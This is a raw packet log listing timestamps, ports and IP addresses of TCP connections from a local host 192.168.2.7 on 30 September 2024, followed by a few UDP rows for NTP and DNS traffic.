                                                                                                                                                                    Sep 30, 2024 18:58:38.499820948 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.603507996 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603533030 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603588104 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.603600025 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603874922 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603890896 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603910923 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.603918076 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.603931904 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.603948116 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.603984118 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.689389944 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.689479113 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.689488888 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.734487057 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.745995045 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.746041059 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.746117115 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.746117115 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.746123075 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.746923923 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.746942997 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.746984005 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.746989012 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.747018099 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.747087955 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.788671017 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.788712025 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.788758039 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.788762093 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.788808107 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.788808107 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.885757923 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.885781050 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.885833025 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.885848045 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.885890007 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.885963917 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.886806011 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.886945963 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.886957884 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.887042999 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.923727989 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.923810959 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.970740080 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.970829964 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.021073103 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.021095991 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.021177053 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.021186113 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.021318913 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.055871964 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.055919886 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.055953979 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.055968046 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.056018114 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.144812107 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.144838095 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.144913912 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.144926071 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.144959927 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.144959927 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.145515919 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.145533085 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.145593882 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.145637035 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.145637035 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.145644903 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.181988955 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.182063103 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.182075977 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.182341099 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.262923002 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.263003111 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.263611078 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.263633013 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.263717890 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.263726950 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.264297009 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.264374018 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.264380932 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.264455080 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.268063068 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.268304110 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.299741030 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.299804926 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.299825907 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.299840927 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.299875975 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.344259024 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.383641005 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.383738995 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.388864994 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.388883114 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.388947964 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.388961077 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.388967037 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.388972998 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.389008045 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.389044046 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.421343088 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.421449900 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.465538025 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.465605021 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.501913071 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.501950979 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.502012014 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.502018929 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.502089024 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.504271030 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.504288912 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.504343033 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.504360914 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.504451036 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.538825989 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.538932085 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.627044916 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.627099991 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.627116919 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.627123117 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.627182007 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.628559113 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.628581047 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.628674984 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.628684998 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629370928 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629393101 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629439116 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.629447937 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629457951 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629487038 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.629493952 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629512072 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.629515886 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.629543066 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.629581928 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.660412073 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.660499096 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.742830992 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.742856026 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.742923021 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.742937088 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.743001938 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.750274897 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.750349045 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.750355959 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.775903940 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.776001930 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.776011944 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.776279926 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.858251095 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.858279943 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.858416080 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.858416080 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.858427048 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.858477116 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.858767986 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.858805895 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.858834982 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.858839989 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.859164953 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.906285048 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.906392097 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.945162058 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.945241928 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.982954025 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.982981920 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.983084917 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.983084917 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.983095884 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.985905886 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.994244099 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:39.994383097 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:39.994390965 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.021948099 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.022056103 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.022066116 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.062953949 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.111762047 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.111790895 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.111886978 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.111898899 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.111937046 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.112010002 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.112135887 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.112152100 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.112215996 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.112221956 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.112243891 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.112261057 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.112303972 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.112365007 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.147038937 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.147217035 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.238214016 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.238286018 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.239353895 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.239372969 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.239408970 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.239434958 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.239449978 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.239470959 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.240230083 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.240304947 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.240314960 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.240341902 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.240371943 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.240411043 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.241054058 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:40.891259909 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:40.891304016 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.891402006 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:40.891756058 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:40.891772985 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.094326019 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.094403028 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.094537020 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:41.348439932 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.349539042 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:41.351744890 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:41.351764917 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.352062941 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.360477924 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:41.403399944 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.542866945 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.542944908 CEST44349724162.159.135.234192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:41.543009043 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:41.543495893 CEST49724443192.168.2.7162.159.135.234
                                                                                                                                                                    Sep 30, 2024 18:58:41.805732012 CEST4971980192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:42.595906973 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:42.595935106 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:53.663961887 CEST4971480192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:59:14.023128986 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.023173094 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.023319960 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.023699045 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.023724079 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.723690033 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.724000931 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.726188898 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.726207018 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.726452112 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.732626915 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.775402069 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.994859934 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.994888067 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.994904041 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.995146990 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.995176077 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.995246887 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.996046066 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.996084929 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.996123075 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.996131897 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.996143103 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.996175051 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.996256113 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.997459888 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.997477055 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:14.997492075 CEST49725443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:59:14.997497082 CEST4434972552.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:16.685651064 CEST44349717104.98.116.138192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:16.685714006 CEST49717443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:59:30.596120119 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:30.596178055 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:30.596256971 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:30.596621990 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:30.596633911 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:31.734653950 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:31.747262955 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:31.747289896 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:31.747797012 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:31.748100042 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:31.748167992 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:31.797209978 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:41.640319109 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:41.640403986 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:41.640568018 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:42.584300995 CEST49727443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:59:42.584331036 CEST44349727142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:00:07.142864943 CEST4970280192.168.2.7172.67.132.65
                                                                                                                                                                    Sep 30, 2024 19:00:07.148276091 CEST8049702172.67.132.65192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:00:07.148375034 CEST4970280192.168.2.7172.67.132.65

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 30, 2024 18:58:17.636629105 CEST123123192.168.2.720.101.57.9
                                                                                                                                                                    Sep 30, 2024 18:58:17.809326887 CEST12312320.101.57.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:19.708942890 CEST6023253192.168.2.71.1.1.1
